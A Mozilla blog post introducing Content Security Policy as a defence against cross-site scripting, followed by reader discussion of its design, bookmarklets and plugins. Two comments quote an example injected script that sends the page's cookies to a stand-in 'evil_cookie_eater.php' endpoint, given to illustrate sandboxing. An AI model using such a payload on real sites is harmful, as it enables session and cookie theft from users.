Shutting Down XSS with Content Security Policy

Brandon Sterne


For several years, Cross-Site Scripting (XSS) attacks have plagued many of the web’s most popular sites and victimized their users. At Mozilla, we’ve been working for the last year on a new technology called Content Security Policy, designed to shut these attacks down. We wanted to give a bit of background on this project as well as provide an update on our progress so far.

XSS is possible because all the content received as part of a web server response is treated with equal privilege by the requesting browser. JavaScript and other content included in a web page are all combined into a single security context which has full access to the DOM. Content Security Policy (CSP) provides a mechanism for sites to explicitly tell the browser which content is legitimate. The browser can then disregard any content which has not been blessed by the site.

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid. Additionally, CSP allows several other common-sense security restrictions to be enforced.

We realize that this model is dramatically different than the current unrestricted model for the Web. We offer the following case supporting CSP’s adoption:

  1. CSP can be implemented in phases.

    While the biggest security benefit offered by Content Security Policy is the mitigation of XSS through inline script blocking, the migration of all JavaScript to external files may be challenging or time-consuming for some sites. Therefore, sites may choose to use the other features of Content Security Policy without adopting the JavaScript restrictions. Our hope is that this flexibility will provide a wide gate for such sites to adopt CSP in a limited fashion early, and later move toward a full implementation as time and resources permit.

  2. Even complex sites can be modified to support CSP.

    We have looked at HTML/JavaScript samples from a wide variety of websites ranging in complexity and have yet to see an example which could not be modified to support CSP. We’ll provide documentation regarding best practices for migrating a site to use CSP. Content Security Policy is also consistent with the programming paradigm “don’t mix code with content” so there may be additional functional benefits to be gained by implementing such separation.

  3. Drive a stake through the heart of XSS!

    XSS vulnerabilities have real value to attackers and are shared rapidly across the Web once discovered. Sites can breathe a little easier knowing that their users are protected, even if a XSS bug slips through. Because CSP can be configured to notify the protected site when an attack is blocked, CSP will even benefit users of older browsers, by helping sites identify and plug vulnerabilities quickly. The bottom line is that it will be extremely difficult to mount a successful XSS attack against a site with CSP enabled. All common vectors for script injection will no longer work and the bar for a successful attack is placed much, much higher.

Content Security Policy has been a collaboration of many individuals and has received input from multiple web sites, browser vendors, and web app security researchers. We are very excited to have reached a level of stability in the design that has allowed us to begin implementation of the CSP specification. Stay tuned for further updates. We will let you know when the fixes have been checked in to trunk and the product is ready to be tested in our nightly builds. Let us know what you think!

Brandon Sterne
Security Program Manager

28 responses

  1. Alan wrote on :

    What’s with the text/x-content-security-policy MIME type and X-Content-Security-Policy HTTP header in the spec? Surely if this is a proposed standard then both of these should be standardised and not marked as proprietary? Otherwise it seems a very good proposal to mitigate XSS attacks.

  2. voracity wrote on :

    I appreciate your efforts to bolster security on the web, but this is an over-reaction. Has anyone conducted any decent risk analysis of XSS attacks? Involving hard estimates of probabilities and utilities (or at least economic costs)? Has anyone compared these costs to breaches of security via other means? (i.e. viruses, malware, browser holes, server exploits, psychological tricks) Would the costs be within even an order of magnitude? Would the costs be within even several orders of magnitude?

    Please answer these questions before you consider radically changing the culture of the web.

    As far as I can tell, all public website XSS problems can be solved very simply by fixing 3rd party cookie security rights (a la web fonts, XHR, etc.) and using sandboxes. The fact that cross-site cookies today aren’t treated with the same gravity as cross-site XHR et al. (by all browser makers) is an absolute scandal.

    This proposal is an inappropriate response to the problem: it is 10 years in jail for littering. Please — *please* — consider what you are doing very carefully before proceeding.

  3. Daniel Veditz wrote on :

    In my own browsing I’ve turned off 3rd party cookies (really off, not Safari and IE’s half-off — “send ’em if you’ve got ’em” sounds suspiciously like the fatalistic “smoke ’em if you’ve got ’em”). It was no protection from any of the XSS attacks disclosed on or in nearly three years of the “So it begins…” thread at,44

  4. Brandon Sterne wrote on :


    I’m not sure I understand your “over-reaction” argument. Content Security Policy is an opt-in mechanism. The severity of the XSS problem in the wild, and the cost of implementing CSP as a mitigation are open to interpretation by individual sites. If the cost vs. benefit doesn’t make sense for some site, they’re free to keep doing business as usual.

  5. voracity wrote on :

    @Brandon: I appreciate CSP is an opt-in security technique (mandatory would be lunacy) but unless I’m much mistaken, you intend it to eventually be used by all major sites. Otherwise, why go to such efforts? If all major sites use it, it will have to be taught in colleges and universities as preferred web-programming practice. Hence why it will change the current culture.

    “The severity of the XSS problem in the wild … [is] open to interpretation by individual sites.”

    Ah, well, I don’t agree; the severity of the XSS problem is objective. It may not be easy to measure the severity (in terms of economic cost or, more accurately, social harm), but it is nonetheless objective. Are there any studies of the long-term economic costs of XSS attacks as compared to viruses or, say, bad web design?

  6. voracity wrote on :

    @Daniel: “[Disabled 3rd party cookies] was no protection from any of the XSS attacks.”

    Really? I hope you’ll understand if I have my doubts.

    You’d at least agree that if someone is logged into their favourite pet store website, an evil 3rd party website can execute privileged actions on the pet store site unless the pet store site has taken appropriate security measures on the server. This wouldn’t be a problem if 3rd party cookie rights were handled properly (that is, as per cross-site XHR and fonts).

    I think we need to be clear about which XSS security issues we are dealing with:

    – HTML injection via GET or POST parameters: These can’t automatically be blocked because you can’t automatically tell the valid from invalid uses of HTML in submitted parameters. Yes, HTML in a GET parameter is unusual today, but it might not always be that way. JSON in a GET parameter was unusual once, too. And page injections here aren’t the real concern (sandboxes can do the protection) — the big worry is injection on the server (e.g. SQL injection, command line injection, out of bounds values, etc.)

    – User submissions and user pages (ebay, facebook, webmail, etc.): Random-boundary sandboxes. Enough said. Also, the style tag should only apply locally within its parent node! (It’s preposterous that style tags are hoisted to document level.) Imagine how simple life would be for the GMail developers if they could simply wrap each email in a conversation in its own sandbox?

    – Identity theft: As I described before, this can be solved by doing 3rd party cookie security properly. Intranets are different, but that’s just because privileges are identified differently (but don’t worry, the problem can still be solved). Identity can also be stolen when cookie authentication is used in conjunction with user submissions — but in those cases, what fixes the problem? Sandboxes.

    Again, the moral of the story is all XSS attacks can be vitiated by proper 3rd party cookie security and sandboxes (very important). In fact, CSP is just a very extreme and very inflexible form of sandbox!

  7. Chase Seibert wrote on :

    I can’t tell if this is a domain, page or DOM node based system. Really, we should have all three. For websites that do have a lot of their own javascript, but output dynamic data into HTML templates, the page based whitelist is critical.

  8. Daniel Veditz wrote on :

    @Chase: The policy is specified per page, although you could approximate per domain using the policyURI option and having all your pages load the same policy. The whitelisting in the policy is domain-based, or I should say origin-based since you also specify the scheme and port of the site from which you’re allowed to load.

    Could you elaborate on what you meant by a “DOM node based system”?

  9. dan w wrote on :

    Thanks for the post on CSP.

    While good web application design does favor separating javascript into
    separate files for both code manageability and efficiency (caching,compression),
    I wonder how much work most websites would require to completely rid most
    webapps of all inline code. Have you done any measurements on this for
    common applications? Regardless, I think there is value in this approach,
    because as you point out, it let’s a site that really cares about CSS put in
    some extra effort to gain better resistance.

    I do not have a deep understanding of the XSS theat model or all solutions that have been proposed, so I am hoping you can answer a question that I have. It seems
    that proposals like CSP try to enforce the principal that ‘only whitelisted
    code can be run on the client’. Since whitelisting code that is inlined
    is markup seems hard, such code is prohibited. It would seems more flexible
    if the site’s policy could simply what code on that page cannot do. For
    example, prevent any javascript on the page from communicating data in any
    form (e.g., cookies) to anything but the originating site. In a sense, this
    would be saying “It’s ok if the attacker can inject code on a page, as long
    as that code cannot do anything truly dangerous” (like steal personal data
    from the page). Of course, this approach has problems in scenarios if a
    browser vulnerability allows javascript (or a malformed image) to break out of
    the sandbox, but that seems like a whole different attack.

    It seems that this approach makes a different trade-off than CSP, favoring
    flexibility for the web developer at the cost of some (but how much) lost
    security. Then again, I may be missing something entirely, as I am no expert
    on XSS. Thanks

  10. frenchfries wrote on :

    From what is understand, this system would be based on a set of rules defined in HTTP headers or meta tags in the web page…
    What about using a single txt file at the root of the server (like the robots.txt file or the cross-domain method used by Flash) ?
    It’s easier to implement, it takes less bandwitdh (won’t be sent at each response from the server) and it’s probably more safe (possibility of headers injection wit CRLF poisoning)

  11. voracity wrote on :

    @dan w: Sandboxing is conceptually simple. For example, the generated page might contain:

    Innocent text
    new XMLHttpRequest().open(“evil_cookie_eater.php?”+document.cookie)
    More innocent text

    During parsing, the browser would identify the sandbox-boundary sections and strip out — during the parse, not DOM construction — anything dangerous that appears inside, leaving this (for example):

    Innocent text
    More innocent text

    I’m actually pretty confident browser makers will do this eventually (there are too many applications that are cumbersome without it). It’s just a question of whether it’s 1 year, 5 years or 10 years. :)

  12. voracity wrote on :

    [Angle brackets got chewed. Is that irony?] Here it is again, with angle brackets replaced with square brackets.


    [div sandbox-boundary=”CDOIJO809DDMo33mdlkDxjk”]
    Innocent text
    [script]new XMLHttpRequest().open(“evil_cookie_eater.php?”+document.cookie)[/script]
    More innocent text
    [/div sandbox-boundary=”CDOIJO809DDMo33mdlkDxjk”]


    [div sandboxed]
    Innocent text
    More innocent text

  13. PaPPy wrote on :

    I know some sites that have shut down due to an XSS worm. It took a lot of time to clean up, and the admin called it quits. Also XSS could lead to sites that store credit cards, amazon, to feed the on going identity theft plague.

    Or you could fake a news article,
    And see if you could get real news coverage 😀

  14. Andre wrote on :

    Has this solution been submitted to the W3C or had an RFC submitted?

  15. Tim Powell wrote on :

    How does this policy affect classic bookmarklets (using javascript: URIs) and Greasemonkey scripts? It is unacceptable to lose the ability to customize pages and their interaction. There’s a fundamental difference between JavaScript embedded in or linked to by pages and JavaScript run by bookmarklets and user scripts, but unfortunately they are often treated the same in the security model.

  16. Daniel Veditz wrote on :

    Greasemonkey scripts are definitely unaffected. I’m not sure about bookmarklets; if we’ve broken them we’ll try to get them working again.

    The goal of CSP is to protect users by cooperating with site authors to enforce their security policies. This in no way means we’ve forgotten that the browser is the _user’s_ agent. It’s right there in the Mozilla Manifesto: “5. Individuals must have the ability to shape their own experiences on the Internet.”

  17. John Bell wrote on :

    I’m very glad to hear that bookmarklets will be repaired if they are broken by CSP. That was my first concern when I heard that this policy was being developed some time ago. I have to say that I am still worried, though, that advanced bookmarklets will be restricted because they act in much the same was as some XSS attacks. For instance, a bookmarklet that bootstraps in a complex javascript app via script tags, which then continues to send data back via other script tag includes. The sandbox that allows bookmarklets also needs to recognize that any actions initiated by that bookmarklet later on also need to be included in the sandbox.

  18. William wrote on :

    Will this stuff be enforced against javascript run via NPN_Evaluate() from an NPAPI plugin?

  19. Daniel Veditz wrote on :

    @John Bell: Some advanced bookmarklets may not work. If the bookmarklet does something that will load data from another site that action will be subject to the CSP whitelist. Anything the bookmarklet adds to the page is part of the page and subject to the limitations on the page.

    It will be possible for users to disable Content Security Policy protection if for some reason they need to do so. The user can weigh the need to run their own script injection against the risk of unauthorized script injection.

    @William: We still have a few blurry edges around plugins. Some plugins can make their own network connections that are completely out of the browsers control. If there’s enough interest in CSP some of the plugin vendors may be interested in extending the NPAPI so they can participate in that model. Some people want to be able to control which types of plugin can load, not just from which sites. So far we’ve resisted that complication but it’s useful feedback. NPN_GetURL() and the like we’re currently planning to vet against the plugin-src whitelist.

    Currently NPN_Evaluate is allowed because you allowed the plugin to load, but we can argue that the plugin’s origin should be vetted against the script-src whitelist before being allowed to call NPN_Evaluate(). It’s an open question.

  20. John Bell wrote on :

    @Daniel Veditz: I’m disappointed to hear that. Is it at least possible for the user to have a global whitelist that overrides the one defined by the page/headers? A granular way to disable CSP that would allow it to still function in general, but trust all script includes that load from specific domains? I certainly see the value in CSP in general and wouldn’t want to recommend that people disable it completely, but a user whitelist (covered in enough warnings) seems like it would be a reasonable way to add CSP without limiting functionality.

More comments:1 2